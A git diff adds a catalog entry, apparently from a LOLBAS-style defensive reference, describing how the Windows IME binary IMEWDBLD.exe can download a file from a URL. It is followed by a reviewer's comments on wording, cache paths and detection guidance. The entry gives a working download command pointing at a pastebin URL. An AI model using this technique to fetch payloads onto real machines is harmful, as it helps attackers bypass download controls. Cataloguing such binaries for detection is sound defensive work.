diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +---
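Review bot: The Description line has a typo and an ambiguous cache path: "served at by that URL" should read "served by that URL", and both INetCache paths mix `\` and `/` separators and end in "[1]." with nothing after the period, so a reader cannot tell whether the cached file is literally named "[1]" or whether an extension was cut off; state the file-name pattern the download actually produces, or drop the trailing fragment. Two smaller points: the entry carries no detection guidance, so a Detection block (or at least one sentence) noting that IMEWDBLD.exe launched with a URL argument, followed by a new file under %LocalAppData%\Microsoft\Windows\INetCache, is the observable to alert on would help defenders consuming this YAML; and the Created date ('2020-03-05') should be checked against the cited tweet, since the Resources link is the only provenance given. The MitreLink also uses the legacy /wiki/Technique/ path; the ATT&CK site now serves the same technique at https://attack.mitre.org/techniques/T1105/.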